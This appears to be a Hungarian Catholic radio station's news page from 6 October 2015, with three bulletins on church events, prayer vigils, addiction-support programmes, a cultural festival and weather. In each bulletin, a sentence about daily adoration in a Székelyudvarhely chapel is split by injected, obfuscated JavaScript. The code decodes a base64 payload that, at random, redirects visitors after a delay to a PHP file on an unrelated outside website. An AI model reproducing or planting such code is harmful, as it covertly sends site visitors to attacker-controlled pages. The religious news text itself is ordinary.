2015. október 6. – Hírek és programajánló

H Í R E K   E S T E

Folytatódik a papi rekollekció
A gyulafehérvári főegyházmegye papsága részére szervezett őszi lelki napok sorozata  holnap Csíksomlyón és Kolozsváron folytatódik, csütörtökön Székelyudvarhelyen és Gyulafehérváron találkoznak a lelkipásztorok. A rekollekció témája: Az Irgalmasság Évének előkészítése, előadói: Szőcs Csaba, a Verbum Keresztény Kulturális Egyesület igazgatója és Dr. Ferenczi Sándor teológiai tanár, plébános. A lelki nap mindenhol délelőtt tíz órakor koncelebrációs szentmisével kezdődik, amelyre várják a híveket is.

Találkozóra várja önkénteseit a Mária Rádió
Holnap déli tizenkét órakor Gyergyószentmiklóson a Szent Miklós plébánián folytatódik a önkéntestalálkozók sorozata, délután fél öt órakor Csíksomlyón a kolostor épületében, ezt követően Bereckben a hét órás szentmise után közönségtalálkozó lesz. A következő helyszínekről hírműsorainkban értesítjük hallgatóinkat.

Boldogok a tiszta szívűek – Imaest a tisztaságért
Tiszta szerelem néven holnap, október 7-én több helyszínen, rendeznek imaestet a párkapcsolatban élő fiatalokért, hiszen a jó, boldogságot adó keresztény család valahol itt kezdődik, jóval a házasságkötés előtt. Ezért szeretnék a szervezők a közös imádsággal, bátorítással is támogatni ebben a fiatalokat. Az imaestekre a következő helyszíneken kerül sor. Sepsiszentgyörgyön a Krisztus Király Plébánián este hat órától, Marosvásárhelyen a Szent Család templomban este hét órától szentmise, tanúságtétel, közös éneklés, Csíkszeredában, a Milleniumi templomban, szintén este hét órától szentmise, tanúságtétel és szentségimádás.

Szerdai pár-beszéd Marosvásárhelyen
A szerdai párbeszédek második évadjában a tizedik alkalom következik. Témája: Életünk váltófázisai és válságai. Meghívott előadók Czikó László búzásbesenyői plébános, mentálhigiénés szakember és Becsky Borbála pszihoterapeuta. Minden érdeklődőt várnak holnap este hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi stúdiójának kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, melynek keretében tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyókat.

Imalánc Sepsiszentgyörgy lelki megújulásáért és a békéért
Október 11-től imalánc indul Sepsiszentgyörgyön „Rózsafüzérrel a város körül” mottóval. Vasárnap délután hat órakor a Szent József templomban lesz szentmise, majd innen indul az imalánc: rózsafüzért imádkozva az őrkői templomhoz vonulnak, hétfőn az őrkői templomtól a Csíki utcai Szent Gellért templomhoz, kedden a Csíki utcaitól az állomási Szent Benedek templomhoz, szerdán a Krisztus király templomhoz, csütörtökön a Krisztus király templomtól vissza a Szent József templomhoz. Itt fejeződik be az imalánc. Hívnak mindenkit, aki imádkozva szeretné bejárni Sepsiszentgyörgy utcáit.

Útmutató a felelős döntésekhez
Ezzel a mottóval szervez tematikus napot a Gyulafehérvári Caritas október 17-én, Gyergyószentmiklóson. Várják azon 17 és 35 év közötti fiatalokat akik szenvedélybeteg családban nőttek fel. Ez a tematikus nap teret, lehetőséget kínál a múlttal való gyógyító találkozásra. A tematikus impulzusok, a sorsközösség megtapasztalása és az elfogadó légkör segíthetnek a múlttal való megbékélésben, a jelen aktív és kreatív megélésében. A találkozó délelőtt tíz órakor kezdődik a gyergyószentmiklósi Márton Áron Szociális Központban. Jelentkezni lehet október 14, déli tizenkét óráig, Borota Gábornál a 0732-830-156-os telefonszámon, vagy a gabor.borota@caritas-ab.ro e-mail címen.

Segítség szenvedélybetegeknek
A Bonus Pastor Alapítvány rövid távú terápiás programot szervez szenvedélybetegeknek és felnőtt hozzátartozóiknak 2015. november 2-13. között Magyarózdon, Maros megyében. Várják azok jelentkezését, akik változtatni szeretnének alkohol-, drog-, nikotin-, játék- vagy társfüggőségükkel terhelt életmódjukon. Jelentkezési határidő 2015. október 26. Bővebb információk a www.bonuspastor.ro weboldalon.

Magyar zsidó kulturális napok a kincses városban
„Szép Város...” - Határtalan Kolozsvár címmel első alkalommal rendezik meg október 7 – 11 között a  Magyar zsidó kulturális napokat Europa Ifjúsági fővárosában, Kolozsváron. E rendezvány valamint a „Korunk Zenéje” fesztivál keretén belül kerül megrendezésre október 8-án csütörtök este 6 órai kezdettel Gyöngyösi Levente szerzői estje a Kolozsvári Evangélikus-Lutheránus templomban. Közreműködik a Nyíregyházi Pro Musica Leánykar, vezényel: Szabó Dénes. A Nyíregyházi Cantemus Vegyeskar, karigazgató: Szabó Soma, valamint az Orfeo Zenekar tagjaiból alakult kamaraegyüttes: Sivák-Nyakas Orsolya – szoprán; és Kálmán László – tenor közremükődésével, vezényel: Vashegyi György.  A belépés díjtalan. Mindenkit szeretettel várnak.

Az időjárásról: Szerdán többfelé kialakulhat eső, zápor és a szél is felélénkül. A hét közepétől egy lassú lehűlés kezdődik, csütörtök hajnalban 0 fok körüli értékekre kell számítani.

MRE - Hírszolgálat, 2015. október 6.


H Í R E K   D É L B E N

Példamutatással élnek
Tizedik alkalommal ünnepelték az időseket világnapjuk alkalmából a Kórházpasztorációs Iroda előkészítésében szentmisével a szatmárnémeti Székesegyházban. Szombaton tizenegy órától Hársfalvi Ottó általános helynök mutatta be a legszentebb áldozatot idős és fiatalabb paptársainak jelenlétében. Szentbeszédében köszönetet mondott az időseknek a szakadatlan imáért, kihangsúlyozva, hogy ez az a gyümölcs amit ők adnak az egyház, a társadalom és a világ számára. Szűz Mária oltalmába ajánlva a jelenlevő időseket, arra bíztatta őket, hogy életükkel mutassanak példát a fiatalabb nemzedéknek és továbbra is imádkozzanak, mert ennek a világnak nagy szüksége van az imájukra. A szentmise végén szeretet-vendégségre került sor a templom udvarán, mely alkalmat adott a jelenlevőknek a beszélgetésre, a gondolatok, örömek megosztására.

Folytatódik a papi rekollekció
A gyulafehérvári főegyházmegye papsága részére szervezett őszi lelki napok sorozata a következő beosztás szerint folytatódik: ma Gyergyószentmiklóson és Brassó-Belvárosban, holnap Csíksomlyón és Kolozsváron, csütörtökön Székelyudvarhelyen és Gyulafehérváron találkoznak a lelkipásztorok. A rekollekció témája: Az Irgalmasság Évének előkészítése, előadói: Szőcs Csaba, a Verbum Keresztény Kulturális Egyesület igazgatója és Dr. Ferenczi Sándor teológiai tanár, plébános. A lelki nap mindenhol délelőtt tíz órakor koncelebrációs szentmisével kezdődik, amelyre várják a híveket is.

Találkozóra várja önkénteseit a Mária Rádió
Ma délelőtt tizenegy órától Marosvásárhelyen, a Deus Providebit Házban, majd délután öt órától Székelyudvarhelyen a Szent Pio lelkigyakorlatos házban talákozunk az önkéntesekkel. Szerdán a következő helyszíneken várjuk önkénteseinket: déli tizenkét órakor Gyergyószentmiklóson a Szent Miklós plébánián, délután fél öt órakor Csíksomlyón a kolostor épületében, ezt követően Bereckben a hét órás szentmise után közönségtalálkozó lesz. A következő helyszínekről hírműsorainkban értesítjük hallgatóinkat.

Szerdai pár-beszéd Marosvásárhelyen
A szerdai párbeszédek második évadjában a tizedik alkalom következik. Témája: Életünk váltófázisai és válságai”. Meghívott előadók Czikó László búzásbesenyői plébános, mentálhigiénés szakember és Becsky Borbála pszihoterapeuta. Minden érdeklődőt várnak holnap este hét órára az Ama Deus cukrászdába.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi stúdiójának kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, melynek keretében tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van. Várják az Istent imádni, engesztelni vágyókat.

Bérmálás a Katalin-telepi plébániatemplomban
Október 11-én, vasárnap Böcskei László megyéspüspök a Szentlélek hét ajándékát kérve a nagyváradi Katalin-telepi plébániatemplomban szolgáltatja ki a bérmálás szentségét. A délelőtt tíz órakor kezdődő szentmisén 29 fiatal és 3 felnőtt részesül a keresztény nagykorúság szentségében. A fiatalok felkészítését Egeli József plébános végezte.

Imalánc Sepsiszentgyörgy lelki megújulásáért és a békéért
Október 11-től imalánc indul Sepsiszentgyörgyön „Rózsafüzérrel a város körül” mottóval. Vasárnap délután hat órakor a Szent József templomban lesz szentmise, majd innen indul az imalánc: rózsafüzért imádkozva az őrkői templomhoz vonulnak, hétfőn az őrkői templomtól a Csíki utcai Szent Gellért templomhoz, kedden a Csíki utcaitól az állomási Szent Benedek templomhoz, szerdán a Krisztus király templomhoz, csütörtökön a Krisztus király templomtól vissza a Szent József templomhoz. Itt fejeződik be az imalánc. Hívnak mindenkit, aki imádkozva szeretné bejárni Sepsiszentgyörgy utcáit.

Templom megáldása Nagyvárad-Őssiben
Október 11-én, vasárnap délután öt órakor Böcskei László megyéspüspök ünnepélyes szentmise keretében megáldja a Kis Szent Terézről nevezett, külsőleg felújított templomot Nagyvárad-Őssiben.

Szentségimádás Micskén és Baromlakán
A nagyváradi egyházmegyében újraéledt örökös szentségimádási nap hagyományának megfelelően október hónap második vasárnapján, 11-én, Micskén és Baromlakán lesz a híveknek lehetősége a szentségimádásba bekapcsolódni.

Kápolna szentelés Árkoson
Október 17-én jubileumi ünnepi szentmisére készülnek Assisi Szent Ferenc Betegápoló Nővérei Árkoson, melynek keretén belül a kolostor megáldására és a kápolna felszentelésére is sor kerül. A nővérek hálát adnak a hívatásuk kegyelméért, szerzetesi közösségük 25 éves fennállásáért, erdélyi alapításuk 10 éves évfordulójáért és kolostoruk felépüléséért. A déli tizenkét órakor kezdődő ünnepi szentmise főcelebránsa Jakubinyi György érsek. A szentmisét rádiónk élő adásban közvetíti.

Az időjárásról: Borongósan, csapadékosan indul a mai nap, majd később nyugat felől szakadozni kezd a felhőzet. A változóan felhős-napos időben záporok továbbra is kialakulnak. A reggelri órákban ismét pára és ködfoltok megjelenésére kell számítani. A meg-megélénkülő szélben délután 17 és 21°C közötti maximumokat mérhetünk.

MRE - Hírszolgálat, 2015. október 6.


H Í R E K   R E G G E L

Folytatódik a papi rekollekció
A gyulafehérvári főegyházmegye papsága részére szervezett őszi lelki napok sorozata a következő beosztás szerint folytatódik: ma Gyergyószentmiklóson és Brassó-Belvárosban, holnap Csíksomlyón és Kolozsváron, csütörtökön Székelyudvarhelyen és Gyulafehérváron találkoznak a lelkipásztorok. A rekollekció témája: Az Irgalmasság Évének előkészítése, előadói: Szőcs Csaba, a Verbum Keresztény Kulturális Egyesület igazgatója és Dr. Ferenczi Sándor teológiai tanár, plébános.  A lelki nap mindenhol délelőtt tíz órakor koncelebrációs szentmisével kezdődik, amelyre  várják a híveket is.

Találkozóra várja önkénteseit a Mária Rádió
Ma délelőtt tizenegy órától Marosvásárhelyen, a Deus Providebit Házban, majd délután öt órától Székelyudvarhelyen a Szent Pio lelkigyakorlatos házban talákozunk az önkéntesekkel. Holnap a következő helyszíneken  várjuk önkénteseinket: déli tizenkét órakor Gyergyószentmiklóson a Szent Miklós plébánián, délután fél öt órakor Csíksomlyón a kolostor épületében, ezt követően Bereckben a hét órás szentmise után közönségtalálkozó lesz. A következő helyszínekről hírműsorainkban értesítjük hallgatóinkat.

Szerdai párbeszédek Marosvásárhelyen
A Szerdai párbeszédek program célja a család, a házasság erősítése, a lelki egészség védelme. A párkapcsolati témák mellett a még vagy már nem házasságban élőkhöz, fiatalokhoz vagy egyedülállókhoz is szól. A meghívott szakemberek az adott témában felvezetőket tartanak, ezt követően közös beszélgetésre hívják a résztvevőket. A mostani találkozás témája, amelyre október 7-én este hét órától kerül sor az Ama Deus cukrászdában, „Életünk váltófázisai és válságai”. Meghívott előadók Czikó László búzásbesenyői plébános, mentálhigiénés szakember és Becsky Borbála pszihoterapeuta.

Engesztelő imavirrasztás Székelyudvarhelyen
A Mária Rádió székelyudvarhelyi kápolnájában minden hónap első szerdáján egész éjjel virrasztást tartanak, tizenegy órától szentmisét mutatnak be. Az engesztelő imavirrasztásra hívnak együtt imádkozni mindenkit, aki Jézussal szeretne időt tölteni. A virrasztást városukért, egyházközségeikért, a fiatalok testi-lelki tisztaságáért, a családokért, egyedülállókért, a jegyesekért, gyermeket vágyó és váró szülőkért, betegekért, elhunyt szeretteikért, saját magukért és egyéni szándékokra ajánlják az udvarhelyiek.
A kápolnában ugyanakkor minden reggel nyolc órától este nyolc óráig állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó, egész napos szentségimádás van Várják az Istent imádni, engesztelni vágyókat.

Bérmálás a Katalin-telepi plébániatemplomban
Október 11-én, vasárnap Böcskei László megyéspüspök a Szentlélek hét ajándékát kérve a nagyváradi Katalin-telepi plébániatemplomban szolgáltatja ki a bérmálás szentségét. A délelőtt tíz órakor kezdődő szentmisén 29 fiatal és 3 felnőtt részesül a keresztény nagykorúság szentségében. A fiatalok felkészítését Egeli József plébános végezte.

Imalánc Sepsiszentgyörgy lelki megújulásáért és a békéért
Október 11-től imalánc indul Sepsiszentgyörgyön „Rózsafüzérrel a város körül” mottóval. Vasárnap délután hat órakor a Szent József templomban lesz szentmise, majd innen indul az imalánc: rózsafüzért imádkozva az őrkői templomhoz vonulnak, hétfőn az őrkői templomtól a Csíki utcai Szent Gellért templomhoz, kedden a Csíki utcaitól az állomási Szent Benedek templomhoz, szerdán a Krisztus király templomhoz, csütörtökön a Krisztus király templomtól vissza a Szent József templomhoz. Itt fejeződik be az imalánc. Hívnak mindenkit, aki imádkozva szeretné bejárni Sepsiszentgyörgy utcáit.

Templom megáldása Nagyvárad-Őssiben
Október 11-én, vasárnap délután öt órakor Böcskei László megyéspüspök ünnepélyes szentmise keretében megáldja a Kis Szent Terézről nevezett, külsőleg felújított templomot Nagyvárad-Őssiben.

Szentségimádás Micskén és Baromlakán
A nagyváradi egyházmegyében újraéledt örökös szentségimádási nap hagyományának megfelelően október hónap második vasárnapján,  október 11-én Micskén és Baromlakán lesz a híveknek lehetősége a szentségimádásba bekapcsolódni.

Kápolna szentelés Árkoson
Október 17-én jubileumi ünnepi szentmisére készülnek Assisi Szent Ferenc Betegápoló Nővérei, melynek keretén belül a kolostor megáldására és a kápolna felszentelésére is sor kerül. A nővérek hálát adnak a hívatásuk kegyelméért, szerzetesi közösségük 25 éves fennállásáért, erdélyi alapításuk 10 éves évfordulójáért és kolostoruk felépüléséért. A déli tizenkét órakor kezdődő ünnepi szentmise főcelebránsa Jakubinyi György érsek. A szentmisét rádiónk élő adásban közvetíti.

Az időjárásról: Borongósan, csapadékosan indul a mai nap, majd később nyugat felől szakadozni kezd a felhőzet. A változóan felhős-napos időben záporok továbbra is kialakulnak. A reggelri órákban ismét pára és ködfoltok megjelenésére kell számítani. A meg-megélénkülő szélben délután 17 és 21°C közötti maximumokat mérhetünk.

MRE - Hírszolgálat, 2015. október 6.

About the author

maradmin

Leave a Comment